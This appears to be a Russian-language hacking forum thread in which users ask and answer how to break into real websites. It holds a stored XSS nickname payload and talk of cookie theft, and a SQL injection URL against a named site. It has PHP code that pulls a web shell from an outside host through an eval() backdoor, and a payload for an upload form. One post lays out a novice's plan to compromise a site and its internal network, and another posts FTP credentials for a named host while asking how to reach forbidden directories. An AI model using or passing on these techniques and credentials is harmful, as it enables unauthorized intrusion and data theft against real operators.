Кто-нибудь может проконсультировать по XSS? Суть такая, короче зарегистровался на сайте под ником '><script>alert()</script> и какую бы страницу я не открыл выскакивает окошко-оповещение, как можно раскрутить?
Можно воровать кукисы, делать редиректы, впихивать вирусы. Да что угодно можно делать, главное - чтобы допустимая длинна логина позволяла вставить желаемый скрипт.
Ник можно очень много букв и цифр впихнуть, после того как я впихнул в ник свой код, как своровать кукисы? Ведь по логике админ должен пройти по какой-то ядовитой ссылке7
Code: http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+[B]where+table_schema=database()[/B]+limit+4,1+--+
На сайте есть минишелл eval(stripslashes($_GET[e])); allow_url_fopen On allow_url_include Off disable_functions exec,passthru,shell_exec,proc_open,popen Как залить полноценный шелл, если в том месте где лежит минишелл нет прав на заливку? т.е сделать аплоадер и залить в данную же папку не прокатит
Если бэкдор не в индексе то просто в него и запиши шелл(предварительно скопируй его содержимое) а там с шелла и смотри по бырому куда залиться. Code: $content=file_get_contents("http://yourshell.txt");$h=fopen("файл с мини шеллом",w);$text=$content;fwrite($h,$text);fclose($h); UPD А еще проще залей текст шелла без <?php и ?> на хост ,а потом ?yourbackdoor=eval(file_get_contents('http://site.ru/shell.txt')); и получишь полноценный шелл без заливки.
Такое не прокатывает какраз((( Вот таким методом выводится через минишелл. file.php?e=phpinfo(); Картинку, текстовый файл и т.п не закачать никак. Не позволяется никак. Файл править не могу, чтобы php вставить. Ранее нормально закачивал таким методом, но щас папка закрыта для правки: file.php?e=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>/form%3E
Добрый день. Прошу прощения за глупый вопрос, но что-то никак не могу решить для себя такую проблему: Хочу получить как можно более широкий доступ к нужному мне сайту, но в этом деле я-новичек. Поэтому сделал следующее: 1. Просканировал сайт акунетиксом (он нашел там читалку файлов, XSS, и поля для брута) 2. Просканировал сайт с помощью Wikto backend, используя структуру, построенную акунетиксом, нашел несколько "спрятанных" файлов, в том числе rsa-ключи для подключения к виртуальной сети 3. Просканировал сайт и виртуальную сеть Нмапом, нашел открытые порты и проассоциировал их с приложениями. 4. В расшаренных папках виртуальной сети ничего интересного не нашел. 5. Читалкой файлов прочитал и сохранил у себя все конфиги и ПХП-шки, какие смог найти. А теперь уперся в стену: сайт использует пофиксенный TBdev, с моими ущербными знаниями ПХП и мускуля трудно надеяться на нахождение инъекции и ее эксплуатацию, кроме того, насколько я понял, инъекция - это почти крайний случай (когда нет доступа к файлам, порты закрыты и т.д.). В моем-же случае есть открытые порты, могу читать файлы, и имею доступ к внутренней сети, но не знаю, как этим воспользоваться. Для себя выстроил следующий алгоритм: 1. Атака на открытые порты сайта и устройств сети (инфы и приложений не могу найти, Nmap почему-то не хочет запускать скрипты) 2. Поиск места хранения файлов базы данных и открытие их через читалку файлов (меня уверяют, что таких файлов не существует) 3. Анализ ПХП кода и составление действующих инъекций (не хватает знаний для анализа структуры кода, а программ, автоматизирующих этот процесс, по-видимому, тоже нет) 4. Брут по доступным формам авторизации (кажись, как-то натыкался на проги, поищу, но админ всегда залогинен, как это обойти, не знаю) 5. XSS (но про них даже еще не читал и пока слабо представляю принцип работы) 6. Помещение троянов во внутреннюю сеть (но это для меня вообще фантастика) Прошу помощи с литературой, методой и софтом, особенно по первым пунктам. Спасибо
собств. вопрос можно ли зная хеш и соль (sql инъекция) залогиниться в админку Vbulletin 4.0.2. хотелось бы узнать технику реализации.
так было гдето статья с помощью хэша и соли логинятся, но только админка при этом не доступна. а так в Вордпрессе можно логинится с помощью хэша без расшифровки актуально до самой последней версии, в джумле соотв. тоже (генерируют куки вот в этом и секрет)
если и есть такой способ, то это единичный случай с конкретной багой по конкретной версии, а так это фейк!
Мембер pinch просто, судя по всему, говоря про WP и Joomla, путает понятия обхода авторизации со сбросом пароля, и последующей авторизацией со своим, уже вновь заданным паролем. Если это так, то где-то тут на Ачате подобная статейка касательно WP точно проскакивала. А, вот, нашел, что я имел ввиду http://forum.antichat.ru/thread359532.html В данной статье раскрывается метод сброса пароля для движка WP, при наличии доступа к БД сайта. И про Joomla там тоже упоминания есть, только в ее случае не все так просто. Надо будет, кстати, поставить плюсик автору статьи за труды. Интересная находка :3
сорь за оффтоп, ток вот не зря там люди жаловались на то что он спалил зту тему, так как и не прошло и 2 недели после его поста как было сделано обновление ворд пресса в котором лавочка прикрылась.
Нужен совет, целесообразно ли копать далее в этой области? Нужно получить фотки с одного ftp host: files.wwe.com случайно наткнуля на страницу там для СМИ давали логин и пароль но доступ они давали строго в одну категорию где особо ничего нужного нет. А теперь вопрос возможно ли как то получить доступ к другим каталогам или хотя бы получить их структуру? Информация что имеется ftp://ftp517:[email protected] Name: ftp517 Password: triple772ftp Host: files.wwe.com когда на сайте захожу в какую либо фотку ссыль такая http://www.wwe.com/f/styles/photo_large/public/photo/image/2013/04/RAW_1036_Photo_007.jpg если убрать /styles/photo_large/public то фотка появляется в чуть большем размере то есть прямой путь к (f) то есть files.wwe.com что и есть host. Просто знаю одного иностранца который имеет доступ к этому серваку но ничего не говорит. И он качает оттуда tiff, dng и так далее куда лучшего качества чем на сайте. Вопрос прозвучал ранее есть ли шанс получить доступ к заветным файлам? через данную инфу?